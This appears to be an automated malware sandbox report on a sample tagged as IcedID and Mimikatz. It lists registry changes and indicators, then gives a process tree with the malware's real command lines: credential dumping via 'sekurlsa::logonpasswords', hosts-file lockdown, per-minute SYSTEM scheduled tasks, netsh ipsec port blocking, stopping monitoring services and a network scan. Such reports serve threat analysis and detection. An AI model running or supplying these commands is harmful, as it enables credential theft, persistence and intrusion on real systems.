\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bbhcwec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4516 cmd.exe 1236 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000700000002344d-6.dat nsis_installer_2 behavioral2/files/0x000d00000002338b-15.dat nsis_installer_1 behavioral2/files/0x000d00000002338b-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" bbhcwec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing bbhcwec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" bbhcwec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ bbhcwec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" bbhcwec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" bbhcwec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bculvvitc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bculvvitc.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ bbhcwec.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1236 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2104 schtasks.exe 3832 schtasks.exe 2016 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1788 2024-08-28_3a4334a6ea258acf38a875d5c1c3e553_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1788 2024-08-28_3a4334a6ea258acf38a875d5c1c3e553_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4832 bbhcwec.exe Token: SeDebugPrivilege 740 bbhcwec.exe Token: SeDebugPrivilege 904 vfshost.exe Token: SeDebugPrivilege 3756 bculvvitc.exe Token: SeLockMemoryPrivilege 3276 zcppya.exe Token: SeLockMemoryPrivilege 3276 zcppya.exe Token: SeDebugPrivilege 4264 bculvvitc.exe Token: SeDebugPrivilege 4360 bculvvitc.exe Token: SeDebugPrivilege 1756 bculvvitc.exe Token: SeDebugPrivilege 2560 bculvvitc.exe Token: SeDebugPrivilege 4500 bculvvitc.exe Token: SeDebugPrivilege 3584 bculvvitc.exe Token: SeDebugPrivilege 1392 bculvvitc.exe Token: SeDebugPrivilege 3420 bculvvitc.exe Token: SeDebugPrivilege 3236 bculvvitc.exe Token: SeDebugPrivilege 2016 bculvvitc.exe Token: SeDebugPrivilege 1376 bculvvitc.exe Token: SeDebugPrivilege 4132 bculvvitc.exe Token: SeDebugPrivilege 3568 bculvvitc.exe Token: SeDebugPrivilege 1044 bculvvitc.exe Token: SeDebugPrivilege 3964 bculvvitc.exe Token: SeDebugPrivilege 4488 bculvvitc.exe Token: SeDebugPrivilege 4584 bculvvitc.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1788 2024-08-28_3a4334a6ea258acf38a875d5c1c3e553_hacktools_icedid_mimikatz.exe 1788 2024-08-28_3a4334a6ea258acf38a875d5c1c3e553_hacktools_icedid_mimikatz.exe 4832 bbhcwec.exe 4832 bbhcwec.exe 740 bbhcwec.exe 740 bbhcwec.exe 3428 xohudmc.exe 2224 ditzew.exe 4264 bbhcwec.exe 4264 bbhcwec.exe 5096 bbhcwec.exe 5096 bbhcwec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1788 wrote to memory of 4516 1788 2024-08-28_3a4334a6ea258acf38a875d5c1c3e553_hacktools_icedid_mimikatz.exe 84 PID 1788 wrote to memory of 4516 1788 2024-08-28_3a4334a6ea258acf38a875d5c1c3e553_hacktools_icedid_mimikatz.exe 84 PID 1788 wrote to memory of 4516 1788 2024-08-28_3a4334a6ea258acf38a875d5c1c3e553_hacktools_icedid_mimikatz.exe 84 PID 4516 wrote to memory of 1236 4516 cmd.exe 86 PID 4516 wrote to memory of 1236 4516 cmd.exe 86 PID 4516 wrote to memory of 1236 4516 cmd.exe 86 PID 4516 wrote to memory of 4832 4516 cmd.exe 95 PID 4516 wrote to memory of 4832 4516 cmd.exe 95 PID 4516 wrote to memory of 4832 4516 cmd.exe 95 PID 740 wrote to memory of 64 740 bbhcwec.exe 97 PID 740 wrote to memory of 64 740 bbhcwec.exe 97 PID 740 wrote to memory of 64 740 bbhcwec.exe 97 PID 64 wrote to memory of 2220 64 cmd.exe 100 PID 64 wrote to memory of 2220 64 cmd.exe 100 PID 64 wrote to memory of 2220 64 cmd.exe 100 PID 64 wrote to memory of 1452 64 cmd.exe 101 PID 64 wrote to memory of 1452 64 cmd.exe 101 PID 64 wrote to memory of 1452 64 cmd.exe 101 PID 64 wrote to memory of 1120 64 cmd.exe 102 PID 64 wrote to memory of 1120 64 cmd.exe 102 PID 64 wrote to memory of 1120 64 cmd.exe 102 PID 64 wrote to memory of 3076 64 cmd.exe 103 PID 64 wrote to memory of 3076 64 cmd.exe 103 PID 64 wrote to memory of 3076 64 cmd.exe 103 PID 64 wrote to memory of 2692 64 cmd.exe 104 PID 64 wrote to memory of 2692 64 cmd.exe 104 PID 64 wrote to memory of 2692 64 cmd.exe 104 PID 64 wrote to memory of 1504 64 cmd.exe 105 PID 64 wrote to memory of 1504 64 cmd.exe 105 PID 64 wrote to memory of 1504 64 cmd.exe 105 PID 740 wrote to memory of 3936 740 bbhcwec.exe 108 PID 740 wrote to memory of 3936 740 bbhcwec.exe 108 PID 740 wrote to memory of 3936 740 bbhcwec.exe 108 PID 740 wrote to memory of 2896 740 bbhcwec.exe 110 PID 740 wrote to memory of 2896 740 bbhcwec.exe 110 PID 740 wrote to memory of 2896 740 bbhcwec.exe 110 PID 740 wrote to memory of 4500 740 bbhcwec.exe 112 PID 740 wrote to memory of 4500 740 bbhcwec.exe 112 PID 740 wrote to memory of 4500 740 bbhcwec.exe 112 PID 740 wrote to memory of 2760 740 bbhcwec.exe 117 PID 740 wrote to memory of 2760 740 bbhcwec.exe 117 PID 740 wrote to memory of 2760 740 bbhcwec.exe 117 PID 2760 wrote to memory of 1768 2760 cmd.exe 119 PID 2760 wrote to memory of 1768 2760 cmd.exe 119 PID 2760 wrote to memory of 1768 2760 cmd.exe 119 PID 1768 wrote to memory of 3852 1768 wpcap.exe 120 PID 1768 wrote to memory of 3852 1768 wpcap.exe 120 PID 1768 wrote to memory of 3852 1768 wpcap.exe 120 PID 3852 wrote to memory of 4200 3852 net.exe 122 PID 3852 wrote to memory of 4200 3852 net.exe 122 PID 3852 wrote to memory of 4200 3852 net.exe 122 PID 1768 wrote to memory of 696 1768 wpcap.exe 123 PID 1768 wrote to memory of 696 1768 wpcap.exe 123 PID 1768 wrote to memory of 696 1768 wpcap.exe 123 PID 696 wrote to memory of 2772 696 net.exe 125 PID 696 wrote to memory of 2772 696 net.exe 125 PID 696 wrote to memory of 2772 696 net.exe 125 PID 1768 wrote to memory of 3860 1768 wpcap.exe 126 PID 1768 wrote to memory of 3860 1768 wpcap.exe 126 PID 1768 wrote to memory of 3860 1768 wpcap.exe 126 PID 3860 wrote to memory of 4344 3860 net.exe 128 PID 3860 wrote to memory of 4344 3860 net.exe 128 PID 3860 wrote to memory of 4344 3860 net.exe 128 PID 1768 wrote to memory of 3428 1768 wpcap.exe 129
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1724
-
C:\Windows\TEMP\htizhpqtw\zcppya.exe"C:\Windows\TEMP\htizhpqtw\zcppya.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3276
-
-
C:\Users\Admin\AppData\Local\Temp\2024-08-28_3a4334a6ea258acf38a875d5c1c3e553_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-28_3a4334a6ea258acf38a875d5c1c3e553_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\rgmymecw\bbhcwec.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1236
-
-
C:\Windows\rgmymecw\bbhcwec.exeC:\Windows\rgmymecw\bbhcwec.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4832
-
-
-
C:\Windows\rgmymecw\bbhcwec.exeC:\Windows\rgmymecw\bbhcwec.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2220
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:1452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1120
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:3076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2692
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1504
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3936
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2896
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4500
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nlmyhmmcu\ycmckpemz\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\nlmyhmmcu\ycmckpemz\wpcap.exeC:\Windows\nlmyhmmcu\ycmckpemz\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4200
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:2772
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3860 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:4344
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:3428
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:4564
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3744 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4236 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2616
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1820
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4360 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1720
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nlmyhmmcu\ycmckpemz\cgpziiqcb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nlmyhmmcu\ycmckpemz\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:872 -
C:\Windows\nlmyhmmcu\ycmckpemz\cgpziiqcb.exeC:\Windows\nlmyhmmcu\ycmckpemz\cgpziiqcb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nlmyhmmcu\ycmckpemz\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nlmyhmmcu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\nlmyhmmcu\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:2792 -
C:\Windows\nlmyhmmcu\Corporate\vfshost.exeC:\Windows\nlmyhmmcu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "teywunqcq" /ru system /tr "cmd /c C:\Windows\ime\bbhcwec.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4640 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "teywunqcq" /ru system /tr "cmd /c C:\Windows\ime\bbhcwec.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nghcwkyek" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rgmymecw\bbhcwec.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3464 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "nghcwkyek" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rgmymecw\bbhcwec.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "wvigymlyb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\htizhpqtw\zcppya.exe /p everyone:F"2⤵PID:3436
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "wvigymlyb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\htizhpqtw\zcppya.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2104
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4288
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2944
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3520
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4344
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1504
-
-
